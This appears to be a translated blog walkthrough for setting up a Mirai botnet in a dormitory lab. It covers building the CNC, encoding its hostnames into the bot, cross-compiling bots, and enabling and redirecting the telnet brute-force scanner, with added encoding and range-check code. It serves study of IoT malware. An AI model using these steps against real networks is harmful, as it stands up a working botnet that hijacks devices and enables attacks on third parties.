Mirai botnet lab environment construction steps

1. Preparation
1. Mirai is written in two languages, C (the bot and the loader) and Go (the CNC), and the CNC keeps its users and bot state in MySQL, so install the toolchain and the database first:

sudo apt-get install git
sudo apt-get install gcc
sudo apt-get install golang
sudo apt-get install electric-fence
sudo apt-get install mysql-server mysql-client

2. Download the source code

git clone https://github.com/jgamblin/Mirai-Source-Code
cd Mirai-Source-Code

The clone contains the bot and CNC (mirai/), the loader (loader/) and the build scripts (scripts/); the commands below are relative to this directory.

3. Modify parameters and configure the CNC

cd mirai/tools && gcc enc.c -o enc.out   // build the enc tool, which XOR-obfuscates the strings the bot keeps in its table (hostnames, ports, credentials)
./enc.out string cnc.changeme.com        // prints a "\x.." literal: the obfuscated form of cnc.changeme.com
./enc.out string report.changeme.com     // prints the obfuscated form of report.changeme.com

Put the two literals into mirai/bot/table.c in place of the cnc.changeme.com entry (line 18) and the report.changeme.com entry (line 21). Each add_entry() call takes the "\x" string and, after it, the byte length that enc.out prints.

Remember: two parameters change on each line, the "\x" string and the length that follows it. Even if you keep the changeme hostnames, regenerate both entries with enc.out and use the length it prints; do not trust the length already in the checked-in file. Those two names must then resolve to Computer B in the lab.
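As an added example (not the project's tools/enc.c and not part of the original post): a small C program that reproduces what enc.out string and enc.out port print, and decodes in the other direction. It relies only on the table key 0xdeadbeef and the byte-by-byte XOR that tools/enc.c and bot/table.c use; the literal and length it returns are what go into add_entry() in table.c. The function names are mine.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Key from the public tools/enc.c and bot/table.c. enc.c applies the four key
 * bytes to every buffer byte one after another, which collapses to a single
 * XOR with (k1 ^ k2 ^ k3 ^ k4). */
static const uint32_t TABLE_KEY = 0xdeadbeef;

/* XOR a buffer in place exactly the way enc.c / table.c do it. */
void mirai_xor(uint8_t *buf, size_t len)
{
    uint8_t k1 = TABLE_KEY & 0xff;
    uint8_t k2 = (TABLE_KEY >> 8) & 0xff;
    uint8_t k3 = (TABLE_KEY >> 16) & 0xff;
    uint8_t k4 = (TABLE_KEY >> 24) & 0xff;
    for (size_t i = 0; i < len; i++) {
        buf[i] ^= k1;
        buf[i] ^= k2;
        buf[i] ^= k3;
        buf[i] ^= k4;
    }
}

/* The effective single-byte key: 0xde ^ 0xad ^ 0xbe ^ 0xef == 0x22. */
uint8_t mirai_effective_key(void)
{
    return (uint8_t)((TABLE_KEY & 0xff) ^ ((TABLE_KEY >> 8) & 0xff)
                   ^ ((TABLE_KEY >> 16) & 0xff) ^ ((TABLE_KEY >> 24) & 0xff));
}

/* Reproduce `enc.out string <s>`: obfuscate s including its NUL terminator and
 * render it as a C "\xNN" literal in out. Returns the byte count to pass as the
 * length argument of add_entry() in table.c, or 0 if out is too small. */
size_t mirai_encode_string(const char *s, char *out, size_t outsz)
{
    size_t len = strlen(s) + 1;              /* enc.c counts the NUL */
    uint8_t buf[256];
    if (len > sizeof buf || outsz < len * 4 + 1)
        return 0;
    memcpy(buf, s, len);
    mirai_xor(buf, len);
    for (size_t i = 0; i < len; i++)
        sprintf(out + i * 4, "\\x%02X", buf[i]);
    out[len * 4] = '\0';
    return len;
}

/* Reproduce `enc.out port <n>`: the port is obfuscated in network byte order
 * (enc.c calls htons() first). Returns 2, or 0 if out is too small. */
size_t mirai_encode_port(uint16_t port, char *out, size_t outsz)
{
    uint8_t buf[2] = { (uint8_t)(port >> 8), (uint8_t)(port & 0xff) };
    if (outsz < 2 * 4 + 1)
        return 0;
    mirai_xor(buf, 2);
    sprintf(out, "\\x%02X\\x%02X", buf[0], buf[1]);
    return 2;
}

/* Reverse direction: decode a raw obfuscated blob (for example bytes lifted
 * from the table of a binary built from this tree) back into a printable
 * string. out must have room for len + 1 bytes. */
void mirai_decode(const uint8_t *blob, size_t len, char *out)
{
    memcpy(out, blob, len);
    mirai_xor((uint8_t *)out, len);
    out[len] = '\0';   /* terminate even if the blob carried no encoded NUL */
}

int main(int argc, char **argv)
{
    /* Default to the lab hostname from the walkthrough. */
    const char *s = argc > 1 ? argv[1] : "cnc.changeme.com";
    char lit[1024];
    size_t n = mirai_encode_string(s, lit, sizeof lit);
    printf("add_entry(TABLE_CNC_DOMAIN, \"%s\", %zu); // %s\n", lit, n, s);
    n = mirai_encode_port(23, lit, sizeof lit);
    printf("add_entry(TABLE_CNC_PORT, \"%s\", %zu); // 23\n", lit, n);
    return 0;
}
```

The decode direction is the one you use when triaging a binary built from this tree: locate the table blob and XOR every byte with 0x22. The encode direction is what step 3 needs, and it shows why the length must be regenerated along with the string: it is strlen plus one for the NUL, which the bot relies on when it unlocks an entry.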

4. Configure the database

cd ../../scripts    // back to Mirai-Source-Code/scripts
gedit db.sql        // edit db.sql

Add use mirai; after the CREATE DATABASE statement so that the tables are created inside that database (shown in the original screenshot).

service mysql start                 // start the MySQL service
cat db.sql | mysql -uroot -proot    // create the database and tables; this assumes the MySQL root password is root
mysql -uroot -proot                 // log in as root with password root
INSERT INTO users VALUES (NULL, 'mirai-user', 'mirai-pass', 0, 0, 0, 0, -1, 1, 30, '');   // add the CNC login (admin, no bot limit); note the password is stored in plaintext
exit                                // leave the MySQL shell

Then edit mirai/cnc/main.go so that the database connection uses the same MySQL credentials as above (root/root here); otherwise the CNC cannot read the users table and logins fail. The edited line is shown in the original screenshot.

5. Configure the cross-compilation environment

cd .. && mkdir cross-compile-bin   // created inside the Mirai-Source-Code directory
cd cross-compile-bin

Download the following 11 toolchain archives:

wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i686.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-x86_64.tar.bz2

(The downloads may be slow. I have put a copy here. Link: https://pan.baidu.com/s/1Z89uaV7boW2SRjIv6Y0Iig
extraction code: 7o34)

These toolchains compile every bot binary in the lab, so treat a copy from a file share as unverified and prefer the uclibc.org originals whenever they are reachable.

cd ../scripts
sudo ./cross-compile.sh

The script installs the toolchains under /etc/xcompile (which is why it needs root) and fetches them itself; if you pre-downloaded the archives above, point the script at those local copies. During the run apt asks whether to install mysql; answer according to whether you already installed it in step 1.

gedit ~/.bashrc   // edit the shell environment

Append the following at the end (one entry for every toolchain directory that cross-compile.sh created under /etc/xcompile; the list in the script is authoritative):

export PATH=$PATH:/etc/xcompile/armv4l/bin
export PATH=$PATH:/etc/xcompile/armv5l/bin
export PATH=$PATH:/etc/xcompile/armv6l/bin
export PATH=$PATH:/etc/xcompile/i586/bin
export PATH=$PATH:/etc/xcompile/m68k/bin
export PATH=$PATH:/etc/xcompile/mips/bin
export PATH=$PATH:/etc/xcompile/mipsel/bin
export PATH=$PATH:/etc/xcompile/powerpc/bin
export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin
export PATH=$PATH:/etc/xcompile/sh4/bin
export PATH=$PATH:/etc/xcompile/sparc/bin
export GOPATH=$HOME/go

source ~/.bashrc     // reload the environment

6. Compile the CNC and the bot

go get github.com/go-sql-driver/mysql
go get github.com/mattn/go-shellwords
cd ../mirai
./build.sh debug telnet
cd ../loader
./build.sh

build.sh debug telnet produces the debug bot (debug/mirai.dbg) together with debug/cnc and debug/scanListen under mirai/; the loader is built separately from loader/. With Go 1.16 or later, set GO111MODULE=off first so that go get and build.sh work in GOPATH mode (the tree has no go.mod).

At this point the environment is fully configured.

2. Roles of the devices
Computer A: the first infected device. Runs ./mirai.dbg, which scans the network for telnet services, brute-forces their credentials, and reports working logins to port 48101 on the loader.
Computer B: the CNC and the loader.
As CNC: runs ./cnc, which listens on ports 23 (bot and operator connections) and 101 (API); bots stay connected to it and receive attack commands from it.
As loader: runs ./scanListen, which listens continuously on port 48101 for the credentials reported by the scanner. (The loader binary built from loader/ is not used in this test; scanListen only prints what the bots report.)
Note that the bot resolves cnc.changeme.com and report.changeme.com with its own resolver (bot/resolv.c sends DNS queries to a hard-coded public server, 8.8.8.8, rather than reading /etc/hosts), so in an isolated lab either change that address to a lab DNS server that answers for both names or redirect the queries to one.




Connection situation:
1 Computers A and B join the dormitory LAN over wifi.
2 Cameras A and B are connected to the dormitory router through a switch.
The goal is that all four devices can reach each other on the same network. Keep that network isolated from the internet: the unmodified scanner picks its targets from public address space (step 5 below), and the bot brute-forces any telnet service it can reach.


3. Test
1. A small adjustment is needed
because the CNC binary lives in mirai/debug/cnc but the source opens prompt.txt by a relative path (as shown in the original screenshot), so it only finds the file when started from the directory that contains it. We therefore keep prompt.txt in the mirai directory and start debug/cnc from there.

 

2. Start the CNC (Computer B)

go build -o debug/cnc cnc/*.go   // run in the mirai directory
./debug/cnc

The output is shown in the original screenshot.

Open a new terminal and connect (may require administrator rights). cnc.changeme.com must resolve to Computer B; for the telnet client an /etc/hosts entry is enough:

telnet cnc.changeme.com 23

When the prompt appears, press Enter, then enter the username and password from the users table (mirai-user / mirai-pass above).

The response shown in the original screenshot indicates a successful login.

3 Start the loader (Computer B)

cd mirai/debug
sudo ./scanListen

Check that it is listening on port 48101:

netstat -lput   // list listening TCP/UDP ports with the owning program

4 Start the scan program (Computer A)
The source disables the scanner in debug builds (scanner_init() in bot/main.c sits inside a preprocessor guard that only applies to non-debug builds), so comment out lines 157 and 162 of bot/main.c (the guard and its #endif) to enable it.

Then recompile in the mirai directory:

./build.sh debug telnet

and run it from mirai/debug (root is required here, because the scanner sends its probes through a raw socket):

sudo ./mirai.dbg

Run it on a disposable VM: besides scanning, the bot's killer module (bot/killer.c) kills other processes bound to the telnet port on the host it runs on.

It will start scanning, as shown in the original screenshot.

5 Control the scanned IP range
The source picks a random target for every probe (get_random_ip() in mirai/bot/scanner.c, from line 674), and it deliberately skips private ranges including 10.0.0.0/8 and 192.168.0.0/16, so an unmodified bot never finds the lab cameras. The code was modified so that the first octet is fixed to 10, which restricts the scan to the lab network; the results after the change are shown in the original screenshot.
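A lab-only replacement for the random target selection, added here as an example and not taken from the post or from the Mirai source: instead of pinning the first octet, it draws targets from a configured lab CIDR and refuses anything outside it, so a typo in the range cannot send probes beyond the lab. The CIDR 10.0.0.0/24 and all function names are assumptions for the example; scanner.c's get_random_ip() returns a network-byte-order ipv4_t, so convert with htonl() if you drop this in, and feed it the bot's own rand_next() instead of rand().

```c
#include <arpa/inet.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Lab subnet for the example; assumed, change it to the dormitory LAN used above. */
#define LAB_CIDR "10.0.0.0/24"

typedef struct {
    uint32_t net;   /* network address, host byte order */
    uint32_t mask;  /* netmask, host byte order */
    int prefix;
} lab_range_t;

/* Parse "a.b.c.d/n" into r. Returns 0 on success, -1 on malformed input. */
int lab_range_parse(const char *cidr, lab_range_t *r)
{
    char buf[32];
    char *slash;
    struct in_addr a;
    int prefix;

    if (strlen(cidr) >= sizeof buf)
        return -1;
    strcpy(buf, cidr);
    slash = strchr(buf, '/');
    if (slash == NULL)
        return -1;
    *slash = '\0';
    prefix = atoi(slash + 1);
    if (prefix < 0 || prefix > 32 || inet_pton(AF_INET, buf, &a) != 1)
        return -1;
    r->prefix = prefix;
    r->mask = prefix == 0 ? 0 : 0xffffffffu << (32 - prefix);
    r->net = ntohl(a.s_addr) & r->mask;
    return 0;
}

/* 1 if ip (host byte order) lies inside the lab range, else 0. Call this before
 * every connect(): it is the guard that keeps a lab scanner inside the lab. */
int lab_ip_allowed(const lab_range_t *r, uint32_t ip)
{
    return (ip & r->mask) == r->net;
}

/* Map a random word onto a usable host address inside the range. For prefixes
 * up to /30 the network and broadcast addresses are skipped, so 10.0.0.0/24
 * yields 10.0.0.1 .. 10.0.0.254. The result is in host byte order. */
uint32_t lab_random_ip(const lab_range_t *r, uint32_t rnd)
{
    uint32_t host_bits = ~r->mask;

    if (r->prefix >= 31)   /* point-to-point or single host: every address is usable */
        return r->net | (rnd & host_bits);
    return r->net + 1 + (rnd % (host_bits - 1));
}

/* Render a host-order address as a dotted quad into out (INET_ADDRSTRLEN bytes). */
const char *lab_ip_str(uint32_t ip, char *out)
{
    struct in_addr a;
    a.s_addr = htonl(ip);
    return inet_ntop(AF_INET, &a, out, INET_ADDRSTRLEN);
}

int main(void)
{
    lab_range_t r;
    char s[INET_ADDRSTRLEN];

    if (lab_range_parse(LAB_CIDR, &r) != 0) {
        fprintf(stderr, "bad CIDR %s\n", LAB_CIDR);
        return 1;
    }
    /* rand() stands in for the bot's rand_next(); it is only a demo entropy source. */
    srand(1);
    for (int i = 0; i < 5; i++) {
        uint32_t ip = lab_random_ip(&r, (uint32_t)rand());
        printf("%s allowed=%d\n", lab_ip_str(ip, s), lab_ip_allowed(&r, ip));
    }
    return 0;
}
```

Keeping the allow check separate from the generator matters: the generator only narrows where probes go, while lab_ip_allowed() is the check that a later edit to the generator (or to the list of skipped ranges in scanner.c) cannot silently undo.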

Origin: www.cnblogs.com/1994july/p/12728744.html